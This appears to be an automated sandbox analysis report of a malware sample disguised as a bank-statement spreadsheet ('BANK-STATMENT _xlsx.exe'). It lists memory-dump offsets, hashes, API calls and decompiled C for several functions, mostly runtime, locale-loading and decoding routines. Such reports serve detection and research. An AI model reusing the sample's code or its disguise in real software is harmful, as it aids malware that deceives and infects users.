                                                                                0x004661de
                                                                                0x004661e4
                                                                                0x004661e5
                                                                                0x004661ea
                                                                                0x004661ed
                                                                                0x004661f0
                                                                                0x004661f5
                                                                                0x004661f6
                                                                                0x004661f7
                                                                                0x00466202
                                                                                0x00466207
                                                                                0x00466209
                                                                                0x0046620f
                                                                                0x00466212
                                                                                0x00466218
                                                                                0x0046621e
                                                                                0x0046621e
                                                                                0x00466222
                                                                                0x00466225
                                                                                0x0046622e
                                                                                0x00466230
                                                                                0x00466237
                                                                                0x00466238
                                                                                0x0046620f
                                                                                0x00466240
                                                                                0x00466242
                                                                                0x00466245
                                                                                0x0046624b
                                                                                0x00466251
                                                                                0x00466251
                                                                                0x0046625a
                                                                                0x0046625d
                                                                                0x00466266
                                                                                0x00466268
                                                                                0x0046626b
                                                                                0x0046626c
                                                                                0x00466242
                                                                                0x00466275

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 0-3760989150
                                                                                • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction ID: 085fb8e70ef0eada5a1d20243ecae5196f57fe3971bb647bf342fdf5a836fb3c
                                                                                • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction Fuzzy Hash: 0251DA7180025DEEDB11DBA8CC40EEEBBBCEF49314F0481EAE559E6191D3789B44CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048CF60, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0048CF6C
                                                                                  • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                                  • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                                • __amsg_exit.LIBCMT ref: 0048CF8C
                                                                                • __lock.LIBCMT ref: 0048CF9C
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048CFB9
                                                                                • InterlockedIncrement.KERNEL32(023A2BA8), ref: 0048CFE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 4271482742-0
                                                                                • Opcode ID: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                                • Instruction ID: f892595e6e8bc3b7f9317b1e981c58d7ef87b17b483e3ce9e4092376cc7d32d2
                                                                                • Opcode Fuzzy Hash: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                                • Instruction Fuzzy Hash: F101E131A01611ABEB11BF25884575E7B61AB01715F04482BEB00A77D0C73C6D41CBEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048B577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0048B595
                                                                                  • Part of subcall function 00489445: __mtinitlocknum.LIBCMT ref: 0048945B
                                                                                  • Part of subcall function 00489445: __amsg_exit.LIBCMT ref: 00489467
                                                                                  • Part of subcall function 00489445: RtlEnterCriticalSection.NTDLL(?), ref: 0048946F
                                                                                • ___sbh_find_block.LIBCMT ref: 0048B5A0
                                                                                • ___sbh_free_block.LIBCMT ref: 0048B5AF
                                                                                • HeapFree.KERNEL32(00000000,?,004926D0,0000000C,00489426,00000000,00492600,0000000C,00489460,?,?,?,0048D525,00000004,004927D0,0000000C), ref: 0048B5DF
                                                                                • GetLastError.KERNEL32(?,0048D525,00000004,004927D0,0000000C,0048B660,?,?,00000000,00000000,00000000,?,0048B14E,00000001,00000214), ref: 0048B5F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2714421763-0
                                                                                • Opcode ID: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                                • Instruction ID: 80bad2d6a6bfc3f9f804d1c8ca66343406cc332f6b57d3fdcfd0cf5f46b783a0
                                                                                • Opcode Fuzzy Hash: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                                • Instruction Fuzzy Hash: B601F731902705BEDF307F729C0A76E7A64DF00768F24492FF500A6690CB3C89818B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004F8170, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                • API String ID: 0-851144607
                                                                                • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                • Instruction ID: 4428056738c1ec361f974de153bb2c1ca2297caa9b4de1d09cfaf12758fc748c
                                                                                • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                • Instruction Fuzzy Hash: 094182B0655642EFC3098F2AC5846C1FFE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004F8309, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                • API String ID: 0-2435369464
                                                                                • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                • Instruction ID: 0a08b35f92fb99a00e0bf9f6e867f43e276e1d31ddc6d6f82e1f0a13e65aa554
                                                                                • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                • Instruction Fuzzy Hash: 6A01F6B4000B498AC721EF61C1846D6BBF0FB45309F51C80FE0A98A204CFF8A19ACF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0048CCC4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0048CCD0
                                                                                  • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                                  • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                                • __getptd.LIBCMT ref: 0048CCE7
                                                                                • __amsg_exit.LIBCMT ref: 0048CCF5
                                                                                • __lock.LIBCMT ref: 0048CD05
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 3521780317-0
                                                                                • Opcode ID: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                                • Instruction ID: fdb5c6d65f8cd6ed5de720e99c888756382875035551d096808b3d9f95a16156
                                                                                • Opcode Fuzzy Hash: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                                • Instruction Fuzzy Hash: 95F09632A007009FD721FB76844675E77E0AB41715F144D6FE544AB291CB7C5D019BAE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046FCFC, Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E0046FCFC(void* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t36;
				void* _t55;
				signed char _t56;
				char* _t66;
				void* _t67;
				void* _t68;

				_t67 = __edi;
				_t55 = __eax;
				_push(__eax);
				_t68 = 0;
				L004703B6();
				_t36 = __eax + 0xfffffffd;
				_v16 = _t36;
				if(_t36 < 0) {
					L18:
					 *((char*)(_t68 + _t67)) = 0;
					return _t68;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - __eax;
				_t5 = _t55 + 2; // 0x46fe76
				_t66 = _t5;
				while(1) {
					_t6 = _t66 - 2; // 0x75fff88b
					_t38 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E0046FCC8(_t38);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t66 - 1; // 0xfc75fff8
					_t40 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E0046FCC8(_t40);
					} else {
						_v5 = 0x3e;
					}
					_t42 =  *_t66;
					if( *_t66 != 0x2e) {
						_t56 = E0046FCC8(_t42);
					} else {
						_t56 = 0x3e;
					}
					_t44 =  *((intOrPtr*)(_t66 + 1));
					if( *((intOrPtr*)(_t66 + 1)) != 0x2e) {
						_v7 = E0046FCC8(_t44);
					} else {
						_v7 = 0x3e;
					}
					 *(_t67 + _t68) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t66 == 0x2d) {
						break;
					}
					 *(_t68 + _t67 + 1) = _t56 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t66 + 1)) == 0x2d) {
						 *((char*)(_t68 + _t67 + 2)) = 0;
						_t34 = _t68 + 2; // 0x2
						return _t34;
					}
					_t68 = _t68 + 3;
					 *(_t68 + _t67 - 1) = _t56 << 0x00000006 | _v7;
					_t25 = _t68 + 5; // 0x2
					_t66 = _t66 + 4;
					if(_t25 >= 0x3ff || _v12 + _t66 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t68 + _t67 + 1) = 0;
				_t31 = _t68 + 1; // 0x1
				return _t31;
			}














                                                                                0x0046fcfc
                                                                                0x0046fd04
                                                                                0x0046fd06
                                                                                0x0046fd07
                                                                                0x0046fd09
                                                                                0x0046fd0e
                                                                                0x0046fd12
                                                                                0x0046fd15
                                                                                0x0046fdcd
                                                                                0x0046fdcd
                                                                                0x00000000
                                                                                0x0046fdd1
                                                                                0x0046fd1b
                                                                                0x0046fd22
                                                                                0x0046fd25
                                                                                0x0046fd25
                                                                                0x0046fd28
                                                                                0x0046fd28
                                                                                0x0046fd28
                                                                                0x0046fd2d
                                                                                0x0046fd3a
                                                                                0x0046fd2f
                                                                                0x0046fd2f
                                                                                0x0046fd2f
                                                                                0x0046fd3d
                                                                                0x0046fd3d
                                                                                0x0046fd42
                                                                                0x0046fd4f
                                                                                0x0046fd44
                                                                                0x0046fd44
                                                                                0x0046fd44
                                                                                0x0046fd52
                                                                                0x0046fd56
                                                                                0x0046fd61
                                                                                0x0046fd58
                                                                                0x0046fd58
                                                                                0x0046fd58
                                                                                0x0046fd63
                                                                                0x0046fd68
                                                                                0x0046fd75
                                                                                0x0046fd6a
                                                                                0x0046fd6a
                                                                                0x0046fd6a
                                                                                0x0046fd86
                                                                                0x0046fd8c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046fd9b
                                                                                0x0046fda3
                                                                                0x0046fde1
                                                                                0x0046fde6
                                                                                0x00000000
                                                                                0x0046fde6
                                                                                0x0046fdab
                                                                                0x0046fdae
                                                                                0x0046fdb2
                                                                                0x0046fdb5
                                                                                0x0046fdbd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046fdbd
                                                                                0x0046fdd7
                                                                                0x0046fddc
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >$>$>$s&F
                                                                                • API String ID: 0-573601131
                                                                                • Opcode ID: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                                • Instruction ID: 2eac1ac47f149cc7f756bd3d5d00c452ac80f5de0da29780c2b8aa333607b310
                                                                                • Opcode Fuzzy Hash: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                                • Instruction Fuzzy Hash: 9831B25180D6C99ED7118A6890467EFFFA54F22308F1886ABC0D657383E26C754E879B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: BANK-STATMENT _xlsx.exe PID: 3984 Parent PID: 1496 BANK-STATMENT _xlsx.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00405C78(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405d7d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AC0( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405D84);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401310();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401318();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401310();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401310();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401310();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                0x00405c79
                                                                                0x00405c7b
                                                                                0x00405c83
                                                                                0x00405c94
                                                                                0x00405c99
                                                                                0x00405cb2
                                                                                0x00405cb9
                                                                                0x00405cfb
                                                                                0x00405cfd
                                                                                0x00405cfe
                                                                                0x00405d03
                                                                                0x00405d06
                                                                                0x00405d09
                                                                                0x00405d1b
                                                                                0x00405d3e
                                                                                0x00405d5e
                                                                                0x00405d5e
                                                                                0x00405d62
                                                                                0x00405d68
                                                                                0x00405d6b
                                                                                0x00405d6e
                                                                                0x00405d7c
                                                                                0x00405cbb
                                                                                0x00405cd0
                                                                                0x00405cd7
                                                                                0x00000000
                                                                                0x00405cd9
                                                                                0x00405cee
                                                                                0x00405cf5
                                                                                0x00405d84
                                                                                0x00405d8c
                                                                                0x00405d93
                                                                                0x00405d94
                                                                                0x00405da7
                                                                                0x00405dac
                                                                                0x00405db5
                                                                                0x00405dcb
                                                                                0x00405dd1
                                                                                0x00405dd2
                                                                                0x00405ddf
                                                                                0x00405de4
                                                                                0x00405de3
                                                                                0x00405de3
                                                                                0x00405df3
                                                                                0x00405dfb
                                                                                0x00405e01
                                                                                0x00405e06
                                                                                0x00405e13
                                                                                0x00405e17
                                                                                0x00405e18
                                                                                0x00405e19
                                                                                0x00405e2e
                                                                                0x00405e2e
                                                                                0x00405e32
                                                                                0x00405e4b
                                                                                0x00405e4f
                                                                                0x00405e50
                                                                                0x00405e51
                                                                                0x00405e61
                                                                                0x00405e66
                                                                                0x00405e6a
                                                                                0x00405e6c
                                                                                0x00405e81
                                                                                0x00405e85
                                                                                0x00405e86
                                                                                0x00405e87
                                                                                0x00405e97
                                                                                0x00405e9c
                                                                                0x00405e9c
                                                                                0x00405e6a
                                                                                0x00405e32
                                                                                0x00405dfb
                                                                                0x00405ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405cf5
                                                                                0x00405cd7

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                • RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                • RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1759228003-2375825460
                                                                                • Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
                                                                                • Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004548A0, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E004548A0(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x454f30);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00454754(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004567F8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E00454818(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045549C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00455440(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044C7E0(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00455980(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043BD14(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043BD14(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043BD14(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x46bb18 = 0;
											_t206 = GetFocus();
											SetFocus(E0043BD14(_t367));
											E00436848(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x46bb18 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00455318(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00454F94(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00455044(_v8);
								} else {
									E00454818(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
